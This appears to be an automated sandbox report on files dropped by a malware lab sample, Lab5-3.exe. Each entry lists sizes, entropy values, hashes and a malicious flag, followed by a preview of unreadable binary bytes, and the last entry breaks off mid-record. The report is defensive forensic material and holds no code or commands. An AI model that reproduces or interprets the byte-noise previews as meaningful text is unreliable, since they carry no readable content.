                                                                                                          Preview:\N.... .H...-b.]..p.a..8..3.g!}...1.R....#.VQ."..O..@...P.X..A....MZ6I.lI\.Z.b.^....k.......F.G..h,..&.~Iy..6.%..z....."I.e.mv.....0M...X......2QC.8.a....5.p6.-.>.f......6a....BV~...+O..6.%.QQ#..V.3`n....o..f...W;+.*...;...=#...}.%Po.....Yb/2.},...n....<K2^6../g.'..O^F.Sr.3.RP...8......%..u.V..0...6..hy.0.a.C....}!....C:u...\K.vL.....V...5.....1.....9...i../...(.Ds)..@I=....f ..p...@h.\.'3.u...7W..l...E.@.....|'......H.P....S.l.Z.......t....#......E..w..."...bX..(T.wp..3...c ....m.%#SRe.%@3..v._....X...{.=Rb8.a.}.....=2....|.hS..4.....'UEL.D.f.p. .T..).R........ .o...#.dTY..-2P..z)].M.K4W).I.0.*..<.H...m.......I.2d....2R..TD...2*......y..G....[k.[4.......6.)5{ .G}b.<@ ........E....v.)..w..34......+..S.r.......'h/..f....h...m.3rE..H=.5.-.kT..mkdYY.N..IW...>......}..y}..h]o=?...nw......o.h../......1s...RO.cy.^8p....;....A.?g.\.....>P.....594........o...c.^...r...r.].P...xz#s....`..V..7&.....`S....@h..&.#.....f......S0....?.0eK....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.928905097338642
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:nqwWC5Nqy0+fPN7NGS/agiAMEIQSjDjHfUTid3hBaUoSGFcmeykEdEElU92i:lxF74ZjUGx0uKeY2ElUJ
                                                                                                          MD5:863A8828B69E66FFBFD944240FB6CB4F
                                                                                                          SHA1:F5BC1561467CE2CA235681FC979D3D818F135A12
                                                                                                          SHA-256:76E36A9200133F5F1D6D67B1FE5FF2CB4383673BE947C03CB23CDAF8E0F3BEB3
                                                                                                          SHA-512:4032173F61D5ECC089C13DC4E76160ECF2E5C06C005FB2C0B0F6C14C20DD89BEBA60D17E2708BC8176B66AF92416B0DF811CB23713D568977DA466BFB5A253FC
                                                                                                          Malicious:false
                                                                                                          Preview:..n..`.k..L..7AE...X.8y....b.a.1..S..R5..Y).5.X.0{ ].."......#......#?#.z.e9..7g....jc.q.....q6.[........ .V...,G.k.......n...Sy2.....s..l!.....8.d.......j.c..N..<.......W..I.K.....+..H....3.+....u...Z..>]..{..T.....zA.?.^J...:....|/.......n.=.W1rB}%.....h.HH.K.B.xN8........I..c.Tf..<.\(..l...>y.2......7.....qoDa.6.+`..O.....3g[...&....^.S.L..).j1p..>.x^.I..<NgQ....c..Ee..<..2.A.5.'.....^#.d........DEU.....r8..G....V..&4s.........Y.@W....Be..ff.o.37..3g.`...<6R.E7.a.}[..M..!#%.....-b|......'s..J...Qf5..4...$y...k..TI..Q.!.RZRp..h...^.>J..Z|b.3.........E...&...o..-.._...S.}..y.....(.....)....L...R.xD..e.}.{.H.....c..#.0.'.9...N..V......&.......G..q.....{~...M...w..~.....,..l..^.C.s`p..,...0...q......yx..*.k.W.UO..c.y/......!:.B.....\..#....%...Bh*.hB.Wp...8|r...d....-....B..../.Ti.:....@..A....s..r8.d...y.A..|P*T..NH=.pC.,3....~p.M.;>..\..3R.Q..RP.YY.K0.F.{.t..2.j:..k......;X...7.3'.0$D"'.A....O.3.Y.. X.f.<..K.....k ..V.............9..&..VIQE.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12896
                                                                                                          Entropy (8bit):7.986449065258786
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:OlDxudYmbY8Wg3iumKeUUv5C1leOWcNv8tkxYzvBZiJmthmR21xFWHZP0lzeyahn:OZ4l15eUUvge8v8pzmd2fFgOzPaftb
                                                                                                          MD5:FE4A011C1C39C0FBD60E923264A0E055
                                                                                                          SHA1:97A897B06967CD1C98D55C90C61C17D1D3D51AEB
                                                                                                          SHA-256:61E537364ADFB28AD268FD00E80008B44F0583199B5451C55B15CA5E96673EC1
                                                                                                          SHA-512:C842365BB8D4EB490A8CD8A4A6C868810D3E6F73C788537428651A30944D7F43A5B50C7619DD4D0441C0E99FDDC03DD8F82009BF1DB0B9531583ED9B8073D842
                                                                                                          Malicious:false
                                                                                                          Preview:Z.....F..9...uc.]...m..N.......e..>,N...5x/E?......y..fN.g...9d.[.Y..2l.?..;..m$..E,(..Z.v(..(...].`XZ9.!.qh/..X..........&&...m.~....!.1...+.F.h.pWl=.>.VU.-.m%oS D.p.._.#."W[...L..n@...y.esg..._.|.t.L..w../d.L\c...}...1=.>.k.f..UP.0../E8.....t.U....N.P'...#s......s.. .I..3J..X..a`....*..2..O\...H,.p+..|..{,.~W..l].\Ct,..-...>.E.._..g:..!j...sg.'..-e....]..b._.h#.hN.sq`...G...5(U....pN..dr.J.,X.Q.bG.uI.=wa*.5"..(.;....X..FQ..C.g..M8L7.+.M.n.S.67X..W..j/.9.JZ..:PN..O.....7.....T.~o.J.G./..Pu....'U....:h...:5....d..t..:)S.w......j\K..7Ce&X.....!G........b}.\%.v....q}[(...c.eK.......bfQB...ME.#C....x....&..-.....Z.....(...Ew.mOf.....w..O..*.{!._.......ag=...7..#..zZ...toD.A.......!.H{sd.....CO..w1..s..,......MY.=RTO.....0.....s..;..G5.P@}SK.....+g..........?1.....gs....~..).G..&...s.....Ts.............U].n}....a.+.L..O>.Y.`....].7.....=+..C...G.1@...CX..T..D....a.......;.....H\.h....G..r..n5.qK..RD..+..../.P=.K...\R:..%...4P.............u.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12640
                                                                                                          Entropy (8bit):7.987110959452492
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:EKQf4pYq35065sbzL96FeB2KY4AS7OQBenQEhUGZgsMAd40Cb:CyJ3R5sbzR6ABhYoOnQ8Zgod4tb
                                                                                                          MD5:D4CCE62C661FCDBA0EFEBC3F6F0E3F30
                                                                                                          SHA1:9C8421549B7DD52AAEFB04C77BCC0AD78CB930FA
                                                                                                          SHA-256:BA10394695BED39BB4B890C4B1BC8CF0B44B9444D34708B0EAEDB69347279A32
                                                                                                          SHA-512:22B41313C816D5F6B515776518BBCA884568C14235DDCAD13A846121229FD961C7C66F02ACF2137E12CD5B699076BB9CC4A6AE71902435B41F355B10FD0C6747
                                                                                                          Malicious:false
                                                                                                          Preview:EX......V.G.:........4..0Y.\&.p..>.....]..79e.1...>.m........Eg....aE9..(.[.n.W.5^..d...(..4......v..r~.[x\.xR8...%6.2..J.e..]k.0..h.?....].7$$...:.MK..Q.s....9GWC...2R...E..........[.8gc...+......+j.wI....?.-K.....V....K"..?.k.W:...`.3.EXI15.".aT*kkw..QO....Q$.{.}.....C......._..G.}....#..^.`k.v..i..^.."6TK.C\./.1.6.......o8$1.......#....%gf...&P3..x....}24[S..y.p...=0J...O..W}jC...A..S.>.....f]..T...I.1.i..C/;R.(....".r.4lG&...RC..>...2.zu;...+..*a..h_J>...p..Vf..(v..,VJ$..5..|..vz........WE...%.Y.9!]3.....n.....5.{.S......S.J....<C^...T.....Nd>.\.9.E.%.1.{.m.Y;.2....U..<.L...c...C.x!....v....0.@..9"..?..X......Q.^......o.....DG.-lS.A...X..h.O....>.2..`.h`....t<....n......:"....1[...... .g.....t8e.n...k..X..*.+.x..5>..2..x...x.@w3..%..!........HC...o..1.?=.C B.(>2.Gf..Y.'.=Gk.nL'.19K}.....a.J29....#r....aYt.<.X./...s....7|..X*..A..{..T...0.....S..2../.f..E.....}..GFv.....`..S.:%...)...0.j.....n..z.^.wH........dI.-.k...W...*....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1904
                                                                                                          Entropy (8bit):7.891628839690058
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:JWJsVfjgTVoJ1Q/KBhHfUTid3hBaUoSGFcmeykEdEElU92i:IIKI6/rGx0uKeY2ElUJ
                                                                                                          MD5:A1B2276D9FBB6E2D2DF7DE936B805ECB
                                                                                                          SHA1:BDA5F45EAECDF8AA68ABC663C135333681B99E41
                                                                                                          SHA-256:C0D6C1A9FD88167C1849CFE6295BCC7DB46B829A93FA95493194A6FD2A097407
                                                                                                          SHA-512:A0AEE4E78E523E2991E5304592B7A57AB64F8BA50C873382269AB667BA9AD7DF04B441C7B721667194B90551FC5249543B2164514CCEF5EDF2705CB73BD1CA0E
                                                                                                          Malicious:false
                                                                                                          Preview:....([..MC.>.j.....-H.W...&f.../.B..g).r..z..-w/w...-...tQ./.2..Q3..{.)....q.........b8.~..VF.....5....=.VF.m=..p..t....E@#.D}...Q....Y4l.i.;...f.Vv..C....UA)..(.......Z.^.x..%..,15...~R.#...(.......D..a.r&:.e.}-.Q.....7p...9q.F...G.J......t...$....yI...J..........z.</o..t!.....e..P.[...=..^.Y..._...B.}.. ....h..x.....~.byE...z..=.$p.4}.L.qo..........S.~.P..9..........d.`.......N.q...I...>x.?.L.=.....f([..@;.%Z9.5b..jH...1.3....}......y3...NS.8..S..o%+.hP.Z#B...)........S.:...Hi*W..`..gc....kq.D.`$M./v.0....hThsTiC..z..}..1Ng.".Y.. ,B9..... .Z.D...3.u......T....AzU[N.t0..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):28976
                                                                                                          Entropy (8bit):7.99383571724346
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:PtmoU7/BdoEmIHeFYHkhwUQe8wGrNjNPlYZ:Pqf5HemkNFGrNxPlYZ
                                                                                                          MD5:7B49318C068B613E448E5AFCE5C52492
                                                                                                          SHA1:D8A2B092105E8B82E999452FF8F238EFEF31540B
                                                                                                          SHA-256:81F5D3C1FB2D5CBB15F88D6E02955579CD804F873366B8EF95836FEC6025F2D6
                                                                                                          SHA-512:EED3128B758E5FF12CED199D0F01D57B12B1BC48C01D017A1A6D93BB4613883564BF93938655F20541C54410DCCB7A113136F9CA008118227286CA036325B08D
                                                                                                          Malicious:true
                                                                                                          Preview:..H.E.|.=..d.WEwTh}..C........Xe"eXa.S}w.F!D...6..../.L.9.....D..9.._.+..g.l3@PE..;%.O;..6.........E....EF.....[...@\f..g.I.)tgcv...q....J(X>C;>.c6d...zcn.f..:.n.;V.G....x=..4.....GG.R...~.m2X....o8....UBQ.(.F.2....g%...OQ#aZ7.D.?*...%T.....y`....F2.....xi.bu.b.f.r.Y.........k..Q,..C.g.uC-x..{..9,o@...jL.*..Ld..f....".7q..l...#...........n.,.......%.=...1aL.v...4..Ly.<G......Hn.0.Uk[<V.c'..&.K..z..]oj'..23.F<a8..>...h.....B..f..v....FB.El..Ne...r....K..Y2,N.Yz.M.1.....A.j..8..b...........'..M....N.....L.T..>......n....-......O.k..5O.z"..Y.>......=.w.<.G...J{.dfk.s...4.G4.g.D... ..@.QN.g...q.`3j.A.4....&.......jd...B........m@o.U{..g.f.,D..o.a.-.*.^..R@T..i..A.f..w2....jRe..."`J|R..j...V.I.I.2...........?.....1d.$...T{....K..B..Q`l/....\[pU....wp.O..y..1^#.../mT..0...!G..vu....ZMb?....|f........_.h .6..~"FO..jOo.n.....6R...p...Q...su...../..{.G..V.:g..3....,...............p........l.%..q.=...@M.j4.,...XZ........|.. ....;.;
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12816
                                                                                                          Entropy (8bit):7.98647709615795
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:JT+hy91xMaUvaqQPKUnd3F/NfTb1moXICJyr7qRHNEJZtb:Z+M5Laaj5UoXA7qROJZZ
                                                                                                          MD5:B665EE3D7B949EC7A7D42C258249AA0D
                                                                                                          SHA1:49236A443F99AC9851D9D3E8FB74A08B95285F09
                                                                                                          SHA-256:16BA2A4A7601EC80DC9974986C27DF255AB9C1E22733C0967BBE0731092BC9C5
                                                                                                          SHA-512:970E2588E4A48BD45838DB8FD2C8EE7D1BF213D5B41C686A4603347368CD944753DA483064C44658C59FDAF4F1CD52AB18421D83312D1BD9B0D5C9626F9BBFF0
                                                                                                          Malicious:false
                                                                                                          Preview:. ...i......On..O.....8...HtAn.?w.t%....../........r...........m..F..#.h`o?YjQpjP.nr..k..k..zc....lL.{...........2]-...T.nm&...'.C...wQ...*..8n....3O....gR..!.......\.I.jZ.4P$..) ..p!.*k.G.,{.4..o."..^.4.B...=....^.".......l...C.#t..c...L7....?..F5_..~.r\=.0...;.8k".XE...A./.k.8.n.[....!7?....-...n..Dp"%pj7m....B...y..M!H...O.Di.......2..#).V...[/...?*.$.*...._.Z...c8=...:"'...qC...P.!B..p.r'&@.U.R.DF.p.$...S..qN.%..q.S.....7r2..[..P.."..i........4E.y.Ue.P....i;.A....@..E]...D...]#i[:.6.......:o.X.e.f...K.Po^."|.....]K.....<.IA@a.|.. .....$Ybg.......hd. ..a..4..t...c=....:P~.].K.7..\.4n?..iA.[..Zp.`.j.@C...B.jB...jl)a.=.......z.k.f.!ReL..=..e..1....S.~R?...@.91....6`x...e.p....V....iE.`....V5.@.....K..6.?;.de'...z.a.-...."...Gy......?.!...Lcr.}.....)B.xs}......R3lo*.@.i.......).....*.{~..GW...I1.8..]x.{.....3.#.e\.+..pMs..D.'L.b.A.....3....6...B.}.u.....~......B..\ .._t...;'?.s..@..s...^...<*..~E.M`..*<`>:...&.5.WE......\..4QV3.......k...P.Jp..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):268460
                                                                                                          Entropy (8bit):7.9984021712606665
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:kqKi7cmuRs1kMFEzghRXrJSzz9zjj8fx8QB2qtqCC/vAnZ:kFUrH135JcznGvtqC1
                                                                                                          MD5:807A1F2970B4426717B138D6D1CC98FF
                                                                                                          SHA1:8B05997E830A2E0C80E1B349CB7B198D338E3D9C
                                                                                                          SHA-256:F0F7C745A1D7860B602D2435D5CC522312CEDB73ED0CCBE59BCBD7CEAB2B1E64
                                                                                                          SHA-512:BFDE339325579C0A913283CD23C3B4155381DDA7925709E63CA24C6DEE6C93642E44CDEE05C73205A27F10FE17E88A5280AE3ED688E1F95AFC7E35554EB32F92
                                                                                                          Malicious:true
                                                                                                          Preview:......3...|..a{..G(....v..q.J......`.....3.)AH.v.nt.5.8..+......}....[..2.@.h'...y_{..-.*.._..tB.M?......l....6.nR5..`...P.~..+.!.T.A...P.......+.M.V..x......|...6?..i.<..;i^.j.; ...._B.;.l..pw.jG.g"d.1t..>.z..f...d#PU6...f....z..N.....S........n..p.R*>!....W.?._]_&K..Fo.w...y...2.....%.e.....q.....&r.z.B4|.[.Q...0p.M...6J..cD.5?.....Y...?...B...M}...Q......R[r.7r....N.....w.......)..w..j....0Ge...8 %..b..@.>.F../.....x.(%.r...f.a..].V...*f....t.d".GS....9K.....5.+..-^.B{......zdES.>.m.&....'%.$..%lD.{.?!.M......\.....B....<.W...-E,..T......`.....-U....i..d...9+.~nNHq...Z../.6...........Lh$aJu._g....b.`.k.Y>.....wI.E..vWJ.]l......y@.<O......+oM.. L.TlI]...H...!g.\.Z.GMk.....b.....W......U....YG*.;..%......7Z...........<..tm...1l>%...P1.K.Ni...dU_...d..Px2..~].*...H....].... ..4..E.d....k......P..f.@....Q.,g..%rxz}.........."....R_U+..........=.L.7.....g...o=kT...F...t...63...o.-.r.F.e..X33..+....k......;.s......sy.......nM.i#.w...W?..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):22320
                                                                                                          Entropy (8bit):7.9911201070151
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:iMGJHVY1xvDI+ookhizrm8Jz2GlMzH+CLCmOtb:YY1FDRIg3nz2SMzH/LCfZ
                                                                                                          MD5:E58CB6CD470314C81E394B70856B6839
                                                                                                          SHA1:908FE7EFEE3FA834AE725257E3683A7657B228DD
                                                                                                          SHA-256:9F81EDAAEBCD6BAD0F294A7BBC646DBEBE29346B4AB695B944D783321B7D89EA
                                                                                                          SHA-512:70F6F7A4F79BD0B84EB2A6C9EC64101351B80BA6A94680832CB974826911CFB61508E2F19D10F5A900B599A06978F2C242A1057A6F906BF37C7350A83F64CEB9
                                                                                                          Malicious:true
                                                                                                          Preview:.0.k.X4K...j......j....G\dH8X....8L...S...V...a.....O.z.3l..'P.D"....r...*.]w.L..G.....{Om...B..y..wzS......;Z.0..h..............~.A.Y..2.B....=.[...t.a....#..d..s..l`.[.M..3...@....b...U3..D...O.QP...CN....Q.6.v)9.yY......J.V.q..B.......\..0...t.`~n...7.t..r.n.oU.....\....V.+C.\'..;kzr..|.fl^.....)...B... ..s .e..q\`...@.Y...#.sj..e.T).*....r..........Z...g..&....|JW..a.....RG.H.M...jp..l.b.b.&7*..W....#...T+....5......,N..v..|.s}.#.....:.X........[..Z.Yu..X.....8........Q.....Mm....5..%5.G,.......q.u.y!t..^$;.iG."C.W:..K.^..Oj...z..4..O..`.C^9.~....R...uY....S^.C....P.R..n....`BE..L.."..o.....?..@.v.q.]7I0.Dk.5N.N)4".r..... ....)8..;.%...]Z.........`..r.ta....g....u.1....`HlS.,...h .(..=./iV.wF\.g.....^.lGQ.a..f.....%...\[.....G..M.ag;..(.......`t..-...4sn3.K~tFmbG.VL....p.....{0.>..Sy.....J.r.........}...T..?...!cY.".`.h.7.99dQHT...$O...K...D....].b..!.[.5T.]a..9.X:.T>;.3...._C...A5..k..j..c.^m.'Pn..|..T.........{.u&q8@'.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12848
                                                                                                          Entropy (8bit):7.987513360816372
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:rg7f1FydCMOTfo+nfrcS1dZKbkCEXM7N9i+tb:CfPeefpnfIS1dZwkCE8pI+Z
                                                                                                          MD5:8A6565A2107A636865A33BE49DEBF4C7
                                                                                                          SHA1:A91D1098AB44452E583C7590494BD989B15654C6
                                                                                                          SHA-256:12A6F378D48A5822DD964FBDE813018937FB7B38690B08DDD2B2DFE924938EA9
                                                                                                          SHA-512:852C13D6D2DBE4C9000986AA3EEE310327C8A5264F5E5CDFE555A5C5ACD1A52569CC098A5E052723A35183B06BAD7B8E5EED520A72894325B280CF3056D74AEB
                                                                                                          Malicious:false
                                                                                                          Preview:}....H...b..i....D..1..|.}=.@...V.z.b>..X6W...w...-......_.I@c...I$.R....=S.V.?.Z..`G.Gh}...../ ..w.Tv..OY..Z.4..|...AZ.....:Q...!...s#..(6..1&...v.f.Zp.v..?O...E.h......},...Hc$.X...;...+...n../...[IPO.6.Y..W5..~9...D.........;.Pu.V49.P|%.-..6gr...HCiy"_.'.....Y#.z8..... .}7....~....V....6..SL.....z."4.#......V. ..A&.p.f.$rH..@.....Gf*.U.r?.........N..}..F.I'M8.....4.3q...y..w......i....G..V..5;.Z.J....ENi....R.".jRc...5,.......'....O.A...2..W.......s.sL0.!.+:(DIl....z..+...R.+.._..9..Q.0..........n.>Z...I....0.4...@.....$....M..W..4.q.0-..`...]..XwF{.U.|&...L.9.83.<.PFB.A_.j.....CO.m...=.S..+b-'.U@5|.1:{.R....{....e.5..a.5.....8..)W.7....[.a.[.I..x.tk9;s9..q....7)U..D.I..,...J....&I..O....|.d..a.l..Q.>.\.Y.Q..-U.0...)...j..0.X.nL...Y...y...BERS......y.....9.(..1.p.w^/.|......J.....mVR.<..b.....l^S...vC.5D...F[.D..|.8sQ6..[........K..r[.....[..v...;H...QJk..sj~.0.."....[....T?V..K.Y...V3>O@..qDC....?.=...!_...8E.......[..& ..d.K..5.p..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4192
                                                                                                          Entropy (8bit):7.949464195919072
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:QnbThijEHUb/C1iNE9U25Ik0qTDpjWeGx0uKeY2ElUJ:KFFSsiN5dkR56N0Cb
                                                                                                          MD5:9FCC5BBF000D9B05888250280A2C2B56
                                                                                                          SHA1:2CE2269CC92AEAC1AEE40C930F9358F9A887259F
                                                                                                          SHA-256:45B44F932B6F9909A07BBF6B7579FAA9CDA646771C0DC6767C8442AE2CBBE206
                                                                                                          SHA-512:CB78ECA93B963395497179014DD96CF66A0EC64B07DA3A039EFE7D721540558D4063EE9E010693213831D3BEE9D2CDCD267D2B0C4BB2089980A03D4E6B92C0DD
                                                                                                          Malicious:false
                                                                                                          Preview:..r..6.s?`.3.^.../m..l..%G....A4.k.."..v..NF[B...5m....R2-..F.0.*..7&~E..i....b..XD.V(.......).Q[c..#0^.G.......Q.....p.!.w?}_r..~..t.4.f%....2bV.y...S.~'-.....$...S:!.8}....#.\.\C.S.Kz4..I..bq_7&.1B9....s.pl..[WM.N3..._.....Iy..*%.`.......'...F...OG@.-...5\zp....8@..v..+3..e..P.r..A............-.6_ ._.......I.e..L..E..........M.....~.....~.A........|.-.2r...O..ru^.........U_H.R.^Y."...P..HnF'o...Y.p...e...^.L<..^.1@.u.9..7.....M.-.C.o..*4.o...]7\.....5.fX...<..&..%,....bD.&......[.0.....4[.A....^:...T..$....:x...T..|.nE)9.|pS..W5..n...k..H.D.<&...%.?..(...4G.r!.....p.U....S....D).L.@.E-........P..gTz.2..#?.}...y]....nM....\......D..cz.Hf4....y)...H....6s.1L.. ...S.>...9....7Qt...cHQ..d.L.)^.H(...{..~s?..8........WTb..Y....l)#N~G.EC.G..YC9.<.S..Dd...0?.>.r\?+.e.h.@.u .SSX.].7>..x...B'#=...3...-..2....(BAy..8.b.Q~7..b1.k.}.x...........YM=.7.e.\....g?.....=.C........X...B...e.>.c..0.J........B<..5(8Ab......G.tO.v8..?......:..r..=..x.&..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12800
                                                                                                          Entropy (8bit):7.987350473995751
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:fssw09nxoZqIrouEqWQTS9A/STAstB3tb:fBw09xyqXuEqW3O/uAszZ
                                                                                                          MD5:0720B3F83D11EE028C9B460BDEDA37E5
                                                                                                          SHA1:FA89816F898FD28B72A5D79F98FC6F5A69E8CF1C
                                                                                                          SHA-256:FD7CF1E3A1F584D42A27B24238A8436A64619DA944149079CC2F6D58D0B03629
                                                                                                          SHA-512:1651A1E493E13D61C1B0BB72649EC34EFF88734E024557D7C8E46B94BBE717B50C3675652109A96ABB35593787A35073E4A43F4C835A6B8B5417FB465E18A18A
                                                                                                          Malicious:false
                                                                                                          Preview:.U.R. ~u.`.yX\.\...hfS^7.&._......r.......H.W..P..!.......X.....0G$;...)N.............%.B...A{o..]....e...d...C>..K......T.x.RT..C9.(.N. .........`.....V]Z.|.W..xc..3..yM..hq.4...f.N..>..O...(.?.a.W..V,"}..F..}e....A..s..9.i5..R..o:..&.=.BT.-.G...v0OdR.>]........#..P]...."...O~6......GnW..%a..oq%.`x.Iv.[..."*.<.B........f.r.@.:...........@4..ZT..Z...Hs.uA.......6(".Yc.~l.r>.rx2...@Y..@.&...r.O".V......o.=........].3...-....m.<#..M#...V....v.-_2...8.~].]...:.kXWv.9OQq..7..x...3....CC`...W.C ..:.=..C...d...l.o...d..^&..J.=..z.a.....e.-.ea......9....FC......A..SRa6....@q..!xH.......M.9..).Ml<&>+..1.'G.\..mPq......U..y.J..sKi.zb.#....{..>...Bpm.3.>8 .L..r....&..d.u.[R,....<..I..X/..,,..f<V..4.\.*T.b.%n.*....(.b..RH...u.5.:...N....sG...A.V..s.LA.<....d.=.N...a.TZ.AZV.k.|d.X..\.g.UrY.C....1..w.\).4..!.c..9.G$.......Y...$..q.!...........2.yQ.v....Y..8<....'..I....dW....{i..f.d.M..&...\/P.... wd....O$.B.==S..*Z.i.....H.._.<..fba'e.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):47104
                                                                                                          Entropy (8bit):7.996126407379644
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:l6IlW3E4BeVZoRN077QCexrZH4cSKq40Ki5i7ct//zZ:AIYoOaInpBisIVzZ
                                                                                                          MD5:A9251DBC5129A5359FA1400FD0FCB9F8
                                                                                                          SHA1:2955A6DE521E3A589FDDDE8ED38D5A1966E69E83
                                                                                                          SHA-256:89CBEEBA58C8AF28F7AE7E20ECB85EB7AA2F8DDF120BC1C9B5B44FB076A6DC48
                                                                                                          SHA-512:BB407A50872AC92210A8D18F654F3AD939874D28DB3D14E8E71F9554BE3B667EDDD96523B53168A1751BFFF2E911F5DDAE4E05FDEC5F32D9D1D528A5EB6234FD
                                                                                                          Malicious:true
                                                                                                          Preview:D .~u*j.&..0d..<...X^..54...<...7..w....._/....%6......=...7.~..Z..a......H.H.E*K..".I..].E.....g7..7....c..;o.....8n...X.m..p.f(..z.Y..?...T..2?%.>?bG...:0..a`jE..S...i.......B...(.....}.)D..p.T2..?^/.yp..]_.-.Uzm.:1..f>=...;.......=....^.s.K>T."5..-,.....$.....L.,.h."....V.=Wy.b..x....xz,<...$..kG.E;......*....K#.e.j....m.\..{..B.z0f9........7K*.CU.L......DH..#Z..x5..0-....3..-...O.b.9.`"....i{b...!......z...pJ}.^W..?.........wR.O..|.J...u...W24.....,.k5..R..O...(.Y].(F.%Q.)..D..>N....q..T...U..3.."#.@xo./_v.d.-.m.q....Q.p .w.....u.U.[.A...).d...\.n.-...F.........o.%......L..*......X.R.G..!..K}....m*...h..o.v... .0.`v.............r.ko.....R.......v...mV..k..7e.R.3%~w..81.!.9...Fl....!..WE..M.....{..8.Ex@,.........#...ikG.z...e....n..3..D.z.6....js.r42;Hi...)..A...$..zI...R..L*....A.x..<.K....ih.[...r"..L.`<.J.ll.(.I....5:.T...g.?.+.....U}.a./...n.C..6j.1...........;.S.4....y.z.|tJ......\....0p......z.E..;.F:].#..=N.....ue/.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15648
                                                                                                          Entropy (8bit):7.989802374161142
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:hlTlo0d0fYNbjZav8qzD3e7j0Ti1BQRhkQ30GmsPTSCjlZzPF/tb:hvzgEYifghkFGbTScNPF/Z
                                                                                                          MD5:1C116EE8F844C3F80E645C8430EB8771
                                                                                                          SHA1:FA32D30AFC6B89AF27C8308EF99C6BB83F63F14A
                                                                                                          SHA-256:96E53827764B5D937D56EA2C95149352C49E42DEA91C8DBAD8EBEEB2C7ECA349
                                                                                                          SHA-512:58F403BDDE7E6BE86D8B95F4E8392F9CE44E53587FC64C5BC9466E4D0D0D87DE8FDE80787F258F0B92486B42C17B1173E5B7B4F837E3DD73150B587BFEE241B7
                                                                                                          Malicious:false
                                                                                                          Preview:...l...a...Wk..2`;....|i.zn"K......N3..). 6g...8$..H.v...l...:..J..}h.K...]<.{..Oo?..+..@$.....\..#...)..?..........A..$J.......D..wfu!..yol.....m....&>...D=}4...d...Z{..9......>7.mTA.T...b.D..N..^..\..aJ..#^.....,c.UK..6....v..>...?@?i.1/).E. M.4....]........^..._.F.,v. ......d.@..:U......5..2.A...E.....4...7g...vv.y ........'...}.$n...9!.!..a.(E.....@Q!ok....=..?5..y..;~..i.,.R.T.O.?.o....Mc..>Z{._&.._...{..`.Qr.%1lo......o.< 'whZn[.e...g..(..{H.T.g.:.K...L.b..}...Mw#ly...L-...o....p...SpW......o?.p....`.4.R...S...X..t...G....36.~...e.r.;...!s.sY..U.,..s..t..j..G..V:..1.-..`r...}..zo.Df.x.q..Y..._.u...]..@...!.k+..(.__...,.......6......2.2X.........#`...iae.L(^.qJ.....CC..i{...^..2....2..0....|.....c...e.J_..<......x...YLj.6..f..........4I..1..Y..z..o@)...B.c.^..).Z.a8.^.r..@Q.."...M..ld..Sn..e*....Oh-..p..t.....$i@.TN.....s.4P......^......i.|.H.)...)u...h..=!AA.#7I8../-.j........*c.q.Dk=x.9[.6CAjo>......6.U.^...`h#...2...b.#....N*.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12848
                                                                                                          Entropy (8bit):7.983606574741776
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:VNfTppPQKvWEihAoY+5wh9xjeoujBK33igxX9XrZcptA55Ll/7e0Cb:VNLfPxWZhAHhndujBK33i2X9yAfL8tb
                                                                                                          MD5:EBBBCA369A14A3629D6FBF5A5206A2C1
                                                                                                          SHA1:4F674194536E834D28BBB34A0396B2E6A490DF50
